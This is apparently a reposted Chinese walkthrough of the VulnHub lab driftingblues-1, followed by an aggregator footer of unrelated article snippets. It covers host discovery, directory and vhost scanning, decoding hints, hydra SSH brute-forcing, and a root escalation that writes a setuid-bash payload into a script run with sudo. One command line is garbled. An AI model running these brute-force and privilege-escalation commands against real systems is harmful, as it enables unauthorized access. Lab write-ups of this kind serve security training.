vulnhub靶场之driftingblues-1

一.环境搭建

1.靶场描述

get flags
difficulty: easy
about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email (it should be on my profile) for troubleshooting or questions.

2.靶场下载

https://www.vulnhub.com/entry/driftingblues-1,625/

image-20240204195436736

3.靶场启动

image-20240204195517626

虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.1.0/24

二.信息收集

1.寻找靶场真实ip地址

nmap -sP 192.168.1.0/24

image-20240204195743518

arp-scan -l

image-20240204195833130

靶场真实ip地址为192.168.1.6

2.探测端口及服务

nmap -p- -sV 192.168.1.6

image-20240204200036360

发现开启了22端口,服务为OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
发现开启了80端口,服务为Apache httpd 2.4.18 ((Ubuntu))

3.web指纹识别

whatweb -v http://192.168.1.6

image-20240204200253063

三.渗透测试

1.访问web服务

image-20240204200348375

2.扫描web服务

1)棱洞3.0指纹识别

./EHole_linux_amd64 finger -u http://192.168.1.6

image-20240204200501925

没有信息

2)nikto扫描网站结构

nikto -h http://192.168.1.6

image-20240204200635070

3)disearch目录扫描

dirsearch -u 192.168.1.6 -e * -x 403 --random-agent

image-20240204200950837

image-20240204200931801

截止到目前,我们没有扫描到如何有用的信息,我们想想还有什么办法,突然想到源代码我们没有查看,我们进行查看

4)查看源代码

image-20240204201131720

我们找了很久,找到一个base64编码,我们进行解密

image-20240204201440212

解密之后,是一个目录

3.渗透测试

1)访问目录

http://192.168.1.6/noteforkingfish.txt

image-20240204201835321

2)解密

我们看到是一个Ook编码,我们进行解密

image-20240204202328901

image-20240204202358528

提示我们修改主机文件,那么我们进行修改

image-20240204202442278

3)修改主机文件

image-20240204202636502

然后我们进行扫描域名

4)gobuster扫描

gobuster vhost -u driftingblues.box -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

image-20240204215145797

重新修改/etc/hosts,添加为192.168.1.6 test.driftingblues.box,然后再后访问test.driftingblues.box

image-20240204215411095

我们进行访问

http://test.driftingblues.box/

image-20240204215534082

扫描到一个eric,我们先记一下

5)dirsearch扫描域名

sudo dirsearch -u http://test.driftingblues.box/ -e * -x 403 --random-agent   

image-20240204215950863

我们进行查看

image-20240204220019202

6)robots.txt

http://test.driftingblues.box/ssh_cred.txt

image-20240204220104846

可能跟ssh登录有关系,果然是ssh登录的密码,不过末尾有数字,其他的都是404

image-20240204220202624

发现这里有个提示:这个的密码需要最后一位加一个数字才是正真的密码 这样的话就有十种可能 所以自己自定义个字典 把十种可能写进去

image-20240204220545518

既然说了是ssh登录的密码,那么我们就进行暴力破解

7)hydra暴力破解

猜测刚刚的提示 账号是 eric使用工具hydra尝试暴力破解,得到密码为:1mw4ckyyucky6 使用ssh 登入即可

hydra -l eric -P '/home/kali/桌面/MS02423.txt'  -v 192.168.1.6 ssh 

image-20240204220902417

我们看到爆破成功,我们进行登录

8)ssh登录

ssh eric@192.168.1.6 

9)提权

sudo -l

image-20240204221247919

我们发现不行,我们查看根目录下的内容

image-20240204221408468

我们找到了第一个flag

到这里,就没有思路了,但是一般情况下,我们会查看的几个目录:home,tmp,/var/www/html/,var

我们一个一个进行查看,在/var/里面发现了backups

我们进行查看,在/var/backups这个备份文件夹中找到一个.sh脚本文件

image-20240204222213298

backup.sh的内容就是用zip命令把/var/www目录下的所有内容打包为/tmp/backup.zip,然后sudo /tmp/emergency,在前面/tmp中找到了这个压缩文件,但是并没有找到emergency文件,需要创建emergency文件,并将eric用户加入sudo组

echo 'cp /bin/bash /tmp/getroot; chmod +s /tmp/getroot' > /tmp/emergency
chmod +x emergency./getroot -p

image-20240204222747642

我们查看flag

image-20240204222837963

image-20240204222856899

四.相关知识

1.靶场下载地址

2.nmap

3.arp-scan

4.masscan

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)

7.nikto工具的使用

8.dirsearch目录扫描

9.ssh登录

10.hydra——密码暴利破解工具Hydra

11.ook解密: Brainfuck/OoK加密解密

12.gobuster扫描

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/488241.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

选择适合你的编程语言

引言 在当今瞬息万变的技术领域中,选择一门合适的编程语言对于个人职业发展和技术成长至关重要。每种语言都拥有独特的设计哲学、应用场景和市场需求,因此,在决定投入时间和精力去学习哪种编程语言时,我们需要综合分析多个因素&a…

opencascade在vs和qt下改变视图方向和设置线框模式

一.改变视图方向(以顶部视图为例) 1.在qt的界面代码中设置好 2.在view.h中设置好槽函数 3.在lzzcad.cpp中设置槽与信号的连接,并在工具栏上显示 4.在view.cpp中给出函数实现 5.给出快捷键实现方式 二.设置线框模式 同上,加入函数…

【Java】RestClient的使用

RestClient的使用 先导入Maven坐标&#xff0c;要和elasticsearch和kibana的版本保持一致 <dependency><groupId>org.elasticsearch.client</groupId><artifactId>elasticsearch-rest-high-level-client</artifactId><version>7.12.1<…

山海鲸可视化:重塑智慧教育的新引擎

在数字化、智能化的时代背景下&#xff0c;智慧教育已成为教育行业发展的重要方向。山海鲸可视化智慧教育解决方案&#xff0c;基于先进的数据可视化技术和大数据分析&#xff0c;为教育机构提供了全方位、个性化的教育支持。它不仅能帮助学生更加高效地学习&#xff0c;还能助…

训练Sora模型,你可能需要这些开源代码,模型,数据集及算力评估

在之前的文章&#xff0c;我们总结了Sora模型上用到的一些核心技术和论文 复刻大模型 Sora 有多难&#xff1f;一张图带你读懂 Sora 的技术路径一文看懂大模型 Sora 技术推演 今天这篇文章来自我们社区讨论交流&#xff0c;我这边整理和总结现有的一些开源代码、模型、数据集…

Redis篇之缓存雪崩、击穿、穿透详解

学习材料&#xff1a;https://xiaolincoding.com/redis/cluster/cache_problem.html 缓存雪崩 什么是缓存雪崩 在面对业务量较大的查询场景时&#xff0c;会把数据库中的数据缓存至redis中&#xff0c;避免大量的读写请求同时访问mysql客户端导致系统崩溃。这种情况下&#x…

【办公类-16-10-01】“2023下学期 中4班 自主游戏观察记录(python 排班表系列)

背景需求 上学期的周安排里&#xff0c;每班每周的自主游戏会轮到多个不同的内容 因此在每周的自主游戏观察有2次记录&#xff0c;观察的项目可以写不一样的&#xff0c; 如一位老师写沙水游戏&#xff0c;另一位写表演游戏 本学期&#xff0c;中班的自主游戏全部是户外的&am…

赌输了可都是自己的,为什么要去赌?

我先解释一下&#xff0c;无论你怎么发送&#xff0c;即使根本没有受到保护&#xff0c;也有概率完好无损&#xff0c;但为什么要赌这个概率呢&#xff1f; 如果你输了赌注&#xff0c;一切都是你的&#xff01; 尽自己最大的努力不是更好吗&#xff1f; 1、快递德邦和顺丰&am…

Android 输入法框架简介

每种平台都有自己的输入法框架. GNU/Linux 桌面环境有多种输入法框架, 比如 ibus, fcitx 等. 但是 Android 操作系统只有一种, 是统一提供的输入法框架. 相关链接: 《ibus 源代码阅读 (1)》 https://blog.csdn.net/secext2022/article/details/136099328https://developer.and…

com.alibaba.nacos.api.exception.NacosException: Request nacos server failed

问题描述 安装nacos2.0以上版本&#xff0c;启动报错:com.alibaba.nacos.api.exception.NacosException: Request nacos server failed com.alibaba.nacos.api.exception.NacosException: Request nacos server failed: at com.alibaba.nacos.client.naming.remote.gprc.Nami…

React18源码: schedule任务调度messageChannel

React调度原理(scheduler) 在React运行时中&#xff0c;调度中心&#xff08;位于scheduler包&#xff09;是整个React运行时的中枢&#xff08;其实是心脏&#xff09;&#xff0c;所以理解了scheduler调度&#xff0c;就基本掌握了React的核心React两大循环&#xff1a;从宏…

[深度学习]yolov9+deepsort+pyqt5实现目标追踪

【YOLOv9DeepSORTPyQt5追踪介绍】 随着人工智能技术的飞速发展&#xff0c;目标追踪在视频监控、自动驾驶等领域的应用日益广泛。其中&#xff0c;YOLOv9作为先进的目标检测算法&#xff0c;结合DeepSORT多目标追踪算法和PyQt5图形界面库&#xff0c;能够为用户提供高效、直观…